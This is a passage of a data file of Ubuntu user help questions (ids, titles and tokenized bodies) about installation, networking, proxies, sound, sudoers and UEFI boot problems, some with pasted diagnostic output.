/efi/microsoft/boot/bootmgfw.efi with grubx64.efi [ but this seems really radical ] . can anyone please help me out ? thanks -- any help is greatly appreciated , as this issue is driving me crazy !
150175	how do i enable hinting for streaming in mp4 files ?	i have used mp4box in the past to enable hinting on mp4 files in the past but it looks like its no longer in the repositories . is there anything else that can be used or do i need to compile from source ?
150181	can not authenticate without a password	the problem can be reproduced as follows : when i remove the password of an administrator account , `` log in without password '' , i can not use that account to authenticate . when i do something that requires authentication , i can not use an admin without a password to authenticate . if i leave the password box blank without a password while choosing a non-password admin , authentication fails ( in terminal or in gui ) . how to fix this problem ?
150184	how do i logout of ubuntu software center ? ( seriously , where 's the logout button ? )	i 'm messing around with syncing software between computers using software center . i want to change what user i am logged into ubuntu software center . ( simple enough , right ? ) i can not figure out how to logout of my software center account so i can login with a different one . the best advice i could find was this : how can i logout of and then log back into ubuntu software center ? it did n't help at all . am i missing something really obvious , or is there really no `` logout '' button anywhere ? thanks in advance !
150185	12.04 refuses to install with windows 7	i have a desktop computer with windows 7 installed on it . recently i downloaded ubuntu 12.04 and burned the iso image on a new blank dvd . after successfully burning dvd , i booted from the dad . ubuntu interface appeared asking me to either choose try ubuntu or install ubuntu . i chose to install ubuntu . again on next screen i choose to install ubuntu inside windows 7 . after pressing continue button the following message appeared : checking battery state ... ... ... ... .. ok checking for running unattended upgrades : acpid : exiting speech dispatcher disabled ; edit /etc/default/ speech -dispatcher * asking all remaining processes to terminate ... ... ... ... . ok please remove installation media and close the tray ( if any ) then press enter : now the problem is that when i remove the installation media ( i.e . the dvd ) and press enter then instead of installing ubuntu the computer reboots into windows 7 ! i am a newbie to ubuntu and therefore do not know much about it . what should i do ?
150188	should i attach the ubuntu iso file to the virtual ide controller ?	steps 31-47 of this guide to install ubuntu on a virtual machine ( using virtualbox ) describe how to attach the ubuntu instal iso image file to the ide controller of the virtual machine . this has not been mentioned or explained in any of the youtube tutorials i watched on installing ubuntu to a virtualbox vm . i have no idea what it is doing or what it means . is this a necessary step ? what does attaching the ubuntu iso file to an ide controller mean ? the cd icon on my virtualbox manager under the ide controller section in the storage setting shows a cd that reads `` empty '' at the moment , which is the same as how it is in the guide before they change it to be lined with the ubuntu iso file .
150191	a tinkered pc resets its nameserver ( resolv.conf ) on each boot	the ubuntu 11.10 pc resets resolv.conf on each boot , only with a comment remaining . how do i fix this by setting the persistent storage ? it was tinkered by somebody else and i ( and him ! ) cant trace his actions . the graphical connection manager also refuses to work thanks to the tinkering . content of interfaces file : root @ technovia-3 : ~/dev/spectrum/spectrum # cat /etc/network/interfaces auto lo iface lo inet loopback
150194	should i be asked for my password when a bug report is sent ?	first thing in the morning i started ubuntu , and the chrome browser . in the browser i visited a page with a password-field on it . so the password-ring popped up . then a dialog popped up asking for a password in order to send a bug report about the system . then the ususal bug-report dialog showed up . ( something about gud & color ) i am not sure about the exact order of dialogs . is the extra question for a password for a bug report normal behaviour ?
150197	internet not working in lan , ubuntu 11.10	i have two ethernet cards . i 'm using broadband in one slot and shared network in another . my problem is that in shared network , internet access is not working . google products open and work , but except for google , it 's not working .
150199	how to upgrade ubuntu 11.10 to ubuntu 12.04 lts using ubuntu 12.04 desktop dvd	i am using dell inspiron 1545 laptop , dual boot os winvista & ubuntu 11.10 , i have got a ubuntu 12.04 lts precise pangolin release i386.iso i want to upgrade to ubuntu 12.04 from 11.10 from the dvd . if i insert the dvd into dvd rom drive , computer asking start pakage manager or cancel . while selecting to start pakage manager , pakage manager opens and tells `` insert the ubuntu 12.04 lts precise pangolin release i386 dvd in the /media/cdrom '' eventhough dvd was inserted in the dvd rom . even i tried to eject and insert somany times , pakage manager did n't find my dvd and asked the same above question . please any body to help me to upgrade the existing ubuntu 11.10 to 12.04 lts . thanks
150201	unlock login keyring is coming everytime i am logging in	every time i log in into ubuntu a window comes titled `` unlock login keyring '' and asks for some password . the problem is when i enter my password it does n't accepts it . what is login keyring ? if it is n't asking about my user account password then which password is it asking about ? i do n't want to come it everytime i login . how do i make it go away ?
150202	difference between live cd and alternate cd ?	i came across this term alternate cd . how it different from a live cd ? also why cant we upgrade using a live cd while we can using an alternate one as mentioned here ? the link does not specify anything about the live cd .
150208	how to configure software center to work with http proxy ?	i installed ubuntu 12.04 lts using the windows installer ( wubi ) yesterday . and then i tried to install chrome , flash player , etc. , but nothing worked . then i tried installing some random package using the software center ( to see if it would work ) , and that did n't work either . most of the times it shows updating cache but nothing happens thereafter . sometimes i get a message saying that it failed to download repository ( i do n't know what this means ) and telling me to check my internet connection . i am using my institutional lan network with a proxy requiring authentication with a username and password . firefox is working fine ... ! i browsed the internet for solutions and i tried many commands in the terminal but nothing worked . today i uninstalled and then freshly installed it again , and then the first thing i did is to ask this question here . so plz help me ... give me a step by step procedure to conquer ubuntu .
150210	how do i set systemwide proxy servers in xubuntu , lubuntu or ubuntu studio ?	i can not find the settings anywhere do i have to set it through terminal through gconftools or is there some gui present for it ?
150212	wireless connected but no internet connection ( ubuntu 12.04 )	i am using same network for 2 days and everything was normal . however , today even though it shows me as connected to the network , i do not have internet connection . if i use ethernet cable instead of wireless , i am still able to connect to the internet . also my friends are able to connect to the wireless network and they can get internet connection . i did not update or install anything since yesterday . therefore i do not have any idea why it is happening . here is some information about my connection : i will be appreciate to any kind of help . root @ ghostrider : /etc/resolvconf # ping 127.0.0.1 ping 127.0.0.1 ( 127.0.0.1 ) 56 ( 84 ) bytes of data . 64 bytes from 127.0.0.1 : icmp_req=1 ttl=64 time=0.042 ms 64 bytes from 127.0.0.1 : icmp_req=2 ttl=64 time=0.023 ms 64 bytes from 127.0.0.1 : icmp_req=3 ttl=64 time=0.036 ms 64 bytes from 127.0.0.1 : icmp_req=4 ttl=64 time=0.040 ms ^c -- - 127.0.0.1 ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 2998ms rtt min/avg/max/mdev = 0.023/0.035/0.042/0.008 ms root @ ghostrider : /etc/resolvconf # ping 192.168.1.3 ping 192.168.1.3 ( 192.168.1.3 ) 56 ( 84 ) bytes of data . ^c -- - 192.168.1.3 ping statistics -- - 19 packets transmitted , 0 received , 100 % packet loss , time 18143ms root @ ghostrider : /etc/resolvconf # ping 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . ^c -- - 8.8.8.8 ping statistics -- - 11 packets transmitted , 0 received , 100 % packet loss , time 10079ms root @ ghostrider : /etc/resolvconf # cat /etc/lsb-release ; uname -a distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04 lts '' linux ghostrider 3.2.0-24-generic-pae # 39-ubuntu smp mon may 21 18:54:21 utc 2012 i686 i686 i386 gnu/linux root @ ghostrider : /etc/resolvconf # lspci -nnk | grep -ia2 net 03:00.0 ethernet controller [ 0200 ] : atheros communications inc. ar8131 gigabit ethernet [ 1969:1063 ] ( rev c0 ) subsystem : lenovo device [ 17aa:3956 ] kernel driver in use : atl1c -- 04:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:0510 ] kernel driver in use : wl root @ ghostrider : /etc/resolvconf # lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 007 : id 0489 : e00d foxconn / hon hai bus 001 device 004 : id 1c7a:0801 lightuning technology inc. fingerprint reader bus 001 device 005 : id 064e : f219 suyin corp . bus 002 device 010 : id 0424:2412 standard microsystems corp . bus 002 device 004 : id 046d : c52b logitech , inc. unifying receiver bus 002 device 011 : id 0403:6010 future technology devices international , ltd ft2232c dual usb-uart/fifo ic root @ ghostrider : /etc/resolvconf # iwconfig lo no wireless extensions . eth1 ieee 802.11 essid : '' politekno '' mode : managed frequency:2.462 ghz access point : 00:16 : e3:40 : c3 : e4 bit rate=54 mb/s tx-power:24 dbm retry min limit:7 rts thr : off fragment thr : off power management : off link quality=5/5 signal level=-52 dbm noise level=-97 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 eth0 no wireless extensions . root @ ghostrider : /etc/resolvconf # rfkill list all 0 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 1 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 2 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 5 : hci0 : bluetooth soft blocked : no hard blocked : no root @ ghostrider : /etc/resolvconf # lsmod module size used by nls_iso8859_1 12617 0 nls_cp437 12751 0 vfat 17308 0 fat 55605 1 vfat usb_storage 39646 0 uas 17828 0 snd_hda_codec_realtek 174055 1 rfcomm 38139 12 parport_pc 32114 0 ppdev 12849 0 bnep 17830 2 joydev 17393 0 ftdi_sio 35859 1 usbserial 37173 3 ftdi_sio snd_hda_intel 32765 3 snd_hda_codec 109562 2 snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec acer_wmi 23612 0 hid_logitech_dj 18177 0 snd_pcm 80845 2 snd_hda_intel , snd_hda_codec uvcvideo 67203 0 btusb 17912 2 snd_seq_midi 13132 0 videodev 86588 1 uvcvideo bluetooth 158438 23 rfcomm , bnep , btusb psmouse 72919 0 usbhid 41906 1 hid_logitech_dj snd_rawmidi 25424 1 snd_seq_midi intel_ips 17753 0 serio_raw 13027 0 root @ ghostrider : /etc/resolvconf # ping 127.0.0.1 ping 127.0.0.1 ( 127.0.0.1 ) 56 ( 84 ) bytes of data . 64 bytes from 127.0.0.1 : icmp_req=1 ttl=64 time=0.042 ms 64 bytes from 127.0.0.1 : icmp_req=2 ttl=64 time=0.023 ms 64 bytes from 127.0.0.1 : icmp_req=3 ttl=64 time=0.036 ms 64 bytes from 127.0.0.1 : icmp_req=4 ttl=64 time=0.040 ms ^c -- - 127.0.0.1 ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 2998ms rtt min/avg/max/mdev = 0.023/0.035/0.042/0.008 ms root @ ghostrider : /etc/resolvconf # ping 192.168.1.3 ping 192.168.1.3 ( 192.168.1.3 ) 56 ( 84 ) bytes of data . ^c -- - 192.168.1.3 ping statistics -- - 19 packets transmitted , 0 received , 100 % packet loss , time 18143ms root @ ghostrider : /etc/resolvconf # ping 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . ^c -- - 8.8.8.8 ping statistics -- - 11 packets transmitted , 0 received , 100 % packet loss , time 10079ms root @ ghostrider : /etc/resolvconf # cat /etc/lsb-release ; uname -a distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04 lts '' linux ghostrider 3.2.0-24-generic-pae # 39-ubuntu smp mon may 21 18:54:21 utc 2012 i686 i686 i386 gnu/linux root @ ghostrider : /etc/resolvconf # lspci -nnk | grep -ia2 net 03:00.0 ethernet controller [ 0200 ] : atheros communications inc. ar8131 gigabit ethernet [ 1969:1063 ] ( rev c0 ) subsystem : lenovo device [ 17aa:3956 ] kernel driver in use : atl1c -- 04:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:0510 ] kernel driver in use : wl root @ ghostrider : /etc/resolvconf # lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 007 : id 0489 : e00d foxconn / hon hai bus 001 device 004 : id 1c7a:0801 lightuning technology inc. fingerprint reader bus 001 device 005 : id 064e : f219 suyin corp . bus 002 device 010 : id 0424:2412 standard microsystems corp . bus 002 device 004 : id 046d : c52b logitech , inc. unifying receiver bus 002 device 011 : id 0403:6010 future technology devices international , ltd ft2232c dual usb-uart/fifo ic root @ ghostrider : /etc/resolvconf # iwconfig lo no wireless extensions . eth1 ieee 802.11 essid : '' politekno '' mode : managed frequency:2.462 ghz access point : 00:16 : e3:40 : c3 : e4 bit rate=54 mb/s tx-power:24 dbm retry min limit:7 rts thr : off fragment thr : off power management : off link quality=5/5 signal level=-52 dbm noise level=-97 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 eth0 no wireless extensions . root @ ghostrider : /etc/resolvconf # rfkill list all 0 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 1 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 2 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 5 : hci0 : bluetooth soft blocked : no hard blocked : no root @ ghostrider : /etc/resolvconf # lsmod module size used by nls_iso8859_1 12617 0 nls_cp437 12751 0 vfat 17308 0 fat 55605 1 vfat usb_storage 39646 0 uas 17828 0 snd_hda_codec_realtek 174055 1 rfcomm 38139 12 parport_pc 32114 0 ppdev 12849 0 bnep 17830 2 joydev 17393 0 ftdi_sio 35859 1 usbserial 37173 3 ftdi_sio snd_hda_intel 32765 3 snd_hda_codec 109562 2 snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec acer_wmi 23612 0 hid_logitech_dj 18177 0 snd_pcm 80845 2 snd_hda_intel , snd_hda_codec uvcvideo 67203 0 btusb 17912 2 snd_seq_midi 13132 0 videodev 86588 1 uvcvideo bluetooth 158438 23 rfcomm , bnep , btusb psmouse 72919 0 usbhid 41906 1 hid_logitech_dj snd_rawmidi 25424 1 snd_seq_midi intel_ips 17753 0 serio_raw 13027 0 hid 77367 2 hid_logitech_dj , usbhid ideapad_laptop 17890 0 sparse_keymap 13658 2 acer_wmi , ideapad_laptop lib80211_crypt_tkip 17275 0 snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event wl 2646601 0 wmi 18744 1 acer_wmi i915 414672 3 drm_kms_helper 45466 1 i915 snd_timer 28931 2 snd_pcm , snd_seq mac_hid 13077 0 snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq lib80211 14040 2 lib80211_crypt_tkip , wl drm 197692 4 i915 , drm_kms_helper i2c_algo_bit 13199 1 i915 snd 62064 15 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_se q , snd_timer , snd_seq_device video 19068 1 i915 mei 36570 0 soundcore 14635 1 snd snd_page_alloc 14108 2 snd_hda_intel , snd_pcm lp 17455 0 parport 40930 3 parport_pc , ppdev , lp atl1c 36718 0 root @ ghostrider : /etc/resolvconf # nm-tool networkmanager tool state : connected ( global ) - device : eth1 [ politekno ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : wl state : connected default : yes hw address : ac:81:12:7f:6b : b2 capabilities : speed : 54 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) cndstudios : infra , 00:12 : bf:3f:0a:8a , freq 2412 mhz , rate 54 mb/s , strength 85 wpa air_ties : infra , 00:1c : a8:6e:84:32 , freq 2462 mhz , rate 54 mb/s , strength 72 wpa2 vkss : infra , 00 : e0:4d:01:0d:47 , freq 2452 mhz , rate 54 mb/s , strength 62 wpa2 progeda : infra , 00:1a:2a:60 : bf:61 , freq 2462 mhz , rate 54 mb/s , strength 47 wpa mobilatolye : infra , 72:2b : c1:65:75:3c , freq 2422 mhz , rate 54 mb/s , strength 35 wpa wpa2 airties_war-141 : infra , 00:1c : a8 : ab : aa:48 , freq 2422 mhz , rate 54 mb/s , strength 35 wpa wpa2 tilda_biri_yeni : infra , 54 : e6 : fc : b0:3c : e9 , freq 2437 mhz , rate 0 mb/s , strength 34 wep *politekno : infra , 00:16 : e3:40 : c3 : e4 , freq 2462 mhz , rate 54 mb/s , strength 100 wpa2 airties_rjy : infra , 00:1a:2a : bd:85:16 , freq 2462 mhz , rate 54 mb/s , strength 55 wep ipv4 settings : address : 0.0.0.0 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 192.168.1.1 - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : atl1c state : unavailable default : no hw address : f0 : de : f1:6c:90:65 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : off root @ ghostrider : /etc/resolvconf # sudo iwlist scan lo interface does n't support scanning . eth1 scan completed : cell 01 - address : 00:16 : e3:40 : c3 : e4 essid : '' politekno '' mode : managed frequency:2.462 ghz ( channel 11 ) quality:5/5 signal level : -48 dbm noise level : -98 dbm ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s ; 6 mb/s ; 9 mb/s 12 mb/s ; 48 mb/s cell 02 - address : 00 : e0:4d:01:0d:47 essid : '' vkss '' mode : managed frequency:2.452 ghz ( channel 9 ) quality:4/5 signal level : -64 dbm noise level : -98 dbm ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s ; 36 mb/s 48 mb/s ; 54 mb/s cell 03 - address : 00:1c : a8 : ab : aa:48 essid : '' airties_war-141 '' mode : managed frequency:2.422 ghz ( channel 3 ) quality:2/5 signal level : -77 dbm noise level : -95 dbm ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : ddb20050f204104a0001101049001e007fc5100018de7cf0d8b70223a62711c18926ac290e30303030303139631044000102103b0001031047001076b31bc241e953cb99c3872554425a28102100194169725469657320576972656c657373204e6574776f726b73102300074169723534343010240008312e322e302e31321042000f4154303939313131383030323832351054000800060050f20400011011000741697235343430100800020084103c000103 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s ; 6 mb/s ; 9 mb/s 12 mb/s ; 48 mb/s cell 04 - address : 72:2b : c1:65:75:3c essid : '' mobilatolye '' mode : managed frequency:2.422 ghz ( channel 3 ) quality:2/5 signal level : -78 dbm noise level : -92 dbm ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk ie : unknown : dda20050f204104a0001101044000102103b00010310470010bc329e001dd811b28601722bc165753c1021001d48756177656920546563686e6f6c6f6769657320436f2e2c204c74642e1023001c48756177656920576972656c6573732041636365737320506f696e74102400065254323836301042000831323334353637381054000800060050f204000110110009487561776569415053100800020084103c000100 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 9 mb/s 18 mb/s ; 36 mb/s ; 54 mb/s ; 6 mb/s ; 12 mb/s 24 mb/s ; 48 mb/s cell 05 - address : 00:12 : bf:3f:0a:8a essid : '' cndstudios '' mode : managed frequency:2.412 ghz ( channel 1 ) quality:5/5 signal level : -47 dbm noise level : -95 dbm ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 22 mb/s 6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s cell 06 - address : 00:1c : a8:6e:84:32 essid : '' air_ties '' mode : managed frequency:2.462 ghz ( channel 11 ) quality:5/5 signal level : -56 dbm noise level : -98 dbm ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 22 mb/s 6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s cell 07 - address : 54 : e6 : fc : b0:3c : e9 essid : '' tilda_biri_yeni '' mode : managed frequency:2.437 ghz ( channel 6 ) quality:1/5 signal level : -85 dbm noise level : -99 dbm encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 12 mb/s ; 24 mb/s ; 36 mb/s ; 9 mb/s ; 18 mb/s 48 mb/s ; 54 mb/s cell 08 - address : 18:28:61:16:57 : c3 essid : '' obilet '' mode : managed frequency:2.437 ghz ( channel 6 ) quality:1/5 signal level : -88 dbm noise level : -99 dbm ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s ; 6 mb/s ; 9 mb/s 12 mb/s ; 48 mb/s cell 09 - address : 00:1a:2a:60 : bf:61 essid : '' progeda '' mode : managed frequency:2.462 ghz ( channel 11 ) quality:2/5 signal level : -75 dbm noise level : -98 dbm ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 22 mb/s 6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s eth0 interface does n't support scanning .
150215	my sound is not working in ubuntu 12.04	my sound is not working . this is the output of sudo lspci : 00:00.0 host bridge : intel corporation 82945g/gz/p/pl memory controller hub ( rev 02 ) 00:01.0 pci bridge : intel corporation 82945g/gz/p/pl pci express root port ( rev 02 ) 00:02.0 vga compatible controller : intel corporation 82945g/gz integrated graphics controller ( rev 02 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 02 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 02 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 )
150217	why is ubuntu reporting a slightly different size for my virtualbox disk ?	i 'm installing ubuntu in a vm using virtualbox ; i selected the dynamic expansion option ( as opposed to fixed ) in virtualbox and set the limit to 85gb . then , when i was installing ubuntu , the virtual disk i created for it states it is 91.3gb . did i make a mistake somewhere or is this difference normal ? if it is normal , why does it exist ? thank you .
150222	/usr/bin/make overwritten accidentally	i am extremely new to ubuntu and linux in general . i accidentally replaced /usr/bin/make with another executable and now i need to fix this . any help will be highly appreciated .
150225	how can i downgrade a ppa package to the official version ?	i have ppa : cr3/ppa in my sources list . it upgrades my checkbox , checkbox-gtk , and checkbox-qt packages to version 0.14~ppa6.12.04 . and now i have problems with updating my system , and sometimes critical system errors . i tried to use ppa-purge to downgrade them - it did n't work . i tried to delete them from synaptic - it wants to delete ubuntu-desktop with them . when i try to update system i 'm getting an error : checkbox checkbox-gtk checkbox-qt e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how can i solve this problem ?
150230	mouse cursor limits using newrez script	i 'm using the newrez script on my netbook . this script seems to draw an image to display with a wider resolution and then resides it to make it fit to my screen using xrandr . this way i can have a 1280*768 resolution on my 1024*600 screen . but my mouse wo n't move further than the virtual 1024*600 boundary on my newly 1280*768 displayed desktop .
150238	ubuntu 12.04 tenda w322p	i had a fully operational version of ubuntu 11.10 running ( 64 bit ) and decided to upgrade to 12.04 . after i did i no longer had network connectivity . i am running a tenda wireless w322p adapter . in the past i had installed it just fine and it was working great . everytime i did a kernel update i would always have to do a modprobe rt3562sta to reinstall and get the network working . now , i do that and i get the error fatal : error inserting rt3562sta ( /lib/modules/3.2.0-24-generic/kernel/drivers/net/wireless/rt3562sta.ko ) : invalid module format i am dead in the water . any ideas ?
150241	run script as root without password	i want to run a script without prompt for password . i edited /etc/sudoers file and i wrote several lines behind last one . this is my file : # defaults env_reset # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all # includedir /etc/sudoers.d jose all= nopasswd : /sbin/shutdown -h now jose all= nopasswd : /sbin/shutdown -r now jose all= nopasswd : /home/jose/sync.sh the script code ( it works fine with password ) is : # ! /bin/bash # filename : sync.sh echo `` empezando sincronizar ... .. '' ping -c 1 -t 1 172.18.2.100 > /dev/null 2 > /dev/null # ping and discard output if [ $ ? -eq 0 ] ; then # check the exit code echo `` $ { ip } is up '' # display the output sudo mount -t smbfs //172.18.2.100/downloads /home/jose/pc1 rsync -r -u -verbose /home/jose/pc1/movies/ /home/jose/movies/ rsync -r -u -verbose /home/jose/pc1/series/ /home/jose/tv ? shows/ sudo umount /home/jose/pc1 # you could send this to a log file by using the > > pinglog.txt redirect else echo `` $ { ip } is down '' fi echo `` fin sincronizacion '' i can shutdown and reboot without type password but when i try to run the last line , the script prompt for password . i replace the script path for `` all '' and i can run root comands without password but i ca n't run the mount / umount command and the script . user belongs ... . jose : jose adm dialout cdrom floppy audio video plugdev users lpadmin sambashare admin any help ? thanks in advance .
150244	how do i set up an ssh socks proxy with gnome ssh tunnel manager ?	generally i use this command to create a local socks proxy via ssh tunneling ssh -nd 7777 -i google.pem ubuntu @ 107.20.x.x then i configure my applications to use socks proxy on localhost ( i.e . 127.0.0.1 ) and it works as expected . i recently came across a gnome application , gnome ssh tunnel manager , also available in the repositories as gstm . gstm has more features which i need , like auto restart and auto connect on start up i am unable to use it as per my requirement . here 's my gstm setup : and the ports on the server i 'm trying to connect to :
150247	fullscreen using multimonitor	i 've got a laptop with an extra external screen attached to it . whenever i try to maximize a window on the second screen by dragging it to the top of it the window maximizes to my laptop screen . is there a solution to this ?
150253	trying to install ubuntu via usb getting error hdio_get_identity failed for dev/sdb	i tried both 64 bit and 32 bit for 12.04 lts and just ca n't get it to get out of the bios . the screen flashes about every 5 seconds or so , and absolutely nothing happens . is there anyway for me to fix this issue ?
150254	how do i reduce the screen and file size of a recorded video , plus convert to flv ?	i have used gtk-recordmydesktop to make a video as an ogv file using the default settings . i need to do 3 things : how can i reduce the screen resolution ( height and width ) so that it can fit into a smaller video size on my website ? how can i pull out like every third frame so that the file size is not so large , yet not mess up the sound ? not all windows ie users can view ogv files . how can i convert to flv ( or , as a fallback , mp4 ) so that i can share on my blog ?
150256	why does the network indicator become invisible ( one-pixel wide ) in gnome-classic on 11.10 ?	i 'm using ubuntu 11.10 , and when running in gnome classic i no longer see an icon for the nm-applet in the top panel . however the applet is running : jsteele @ jsteele-00 : ~ $ ps aux | grep nm-applet jsteele 2767 0.0 0.2 454584 16576 ? sl 08:57 0:01 nm-applet jsteele 3304 0.0 0.0 9260 900 pts/0 s+ 09:32 0:00 grep -- color=auto nm-applet i noticed that i can actually click on the far right `` pixel '' of the panel and i get the nm-applet menu ( so it is present and functional , just not visible ) . ideally i would like an icon to be visible . in unity the nm-applet icon is present and operates as i would expect - is this a compatibility issue between unity and gnome classic ? ( possibly similar to this question , but does n't indicate that the applet is still operational and sufficiently different for me to raise this separate question ; equally there is n't an answer that resolves the issue for me : network manager icon does n't appear in top panel )
150259	hp probook 4720s uefi boot only manually into 12.04	i 'm trying to get uefi boot on my probook 4720s . because i swapped the hdd for a ssd i had a blank canvas to start . the 12.04 live dvd refuses to boot into uefi , as do alternate and desktop cd 's . however , when i make a 16gb flashdrive into a live fs using the bootdisk tool in ubuntu , i can boot from usb , manually into uefi mode . it even sidesteps to dvd as medium when i boot from usb with 12.04 live dvd present . i installed a gpt partitiontable with part 1 , label efi , fs fat32 , flag boot , mounts at /boot/efi part 2 , label linux-root , fs ext4 , no flags , mounts at / part 3 , label linux-swap , fs swap , no flags , mounts as swap so far , my system refuses to boot from harddrive by itself . i have to select '' boot from efi file '' and manually browse to ( hd0 , gpt1 ) \efi\ubuntu\grubx64.efi any other option ends in `` no system disk , please insert boot disk '' i tried installing burg , but that merely enforces non-efi boot . i tried most of the solutions i could find , but one says 